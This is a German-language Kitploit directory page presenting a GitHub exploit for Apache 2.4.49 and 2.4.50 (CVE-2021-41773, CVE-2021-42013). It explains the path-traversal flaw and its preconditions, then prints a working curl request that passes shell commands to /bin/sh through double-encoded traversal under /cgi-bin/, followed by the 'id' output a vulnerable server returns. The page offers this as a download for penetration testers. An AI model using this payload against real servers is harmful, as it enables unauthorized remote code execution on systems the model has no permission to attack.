Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41773 — Remote Code Execution Exploit für Apache-Server. Betroffene Versionen: Apache 2.4.49, Apache 2.4.50 | Kitploit
Tools/GitHubGitHub/mr-exo/cve-2021-41773
AufklärungPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Remote Code Execution Exploit für Apache-Server. Betroffene Versionen: Apache 2.4.49, Apache 2.4.50

Repository anzeigen
11vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RCE-Exploit für Apache 2.4.49 (CVE-2021-41773) und 2.4.50 (CVE-2021-42013):

IMHO nur „spezielle“ Setups sind für diesen RCE anfällig.
Dasselbe gilt für die „Arbitrary File Read“-Exploits, die du gesehen hast.

Beide CVEs sind tatsächlich fast dieselbe Path-Traversal-Schwachstelle (die zweite ist der unvollständige Fix für die erste).
Path Traversal funktioniert nur von einer zugeordneten URI aus (z. B. über Apache-Direktiven wie „Alias“ oder „ScriptAlias“). Nur DocumentRoot reicht nicht aus.

„/cgi-bin/“ ist standardmäßig zugeordnet (ScriptAlias), weshalb es vor der Path-Traversal-Zeichenkette verwendet wird.
Außerdem markiert ScriptAlias alle Inhalte des angegebenen Verzeichnisses als Exec (für Apache), unabhängig von den Dateierweiterungen.

Voraussetzungen:

1/ mod_cgi aktiviert (nicht Standard, aber einfach)
2/ Ziel-Binary sollte +x sein (Standard für /bin/sh)
3/ Apache-Berechtigungen für /bin oder / erteilt (nicht Standard und schwierig/unrealistisch)\

Prüfen, ob der Server verwundbar ist:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Antwort eines verwundbaren Servers:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Tool herunterladen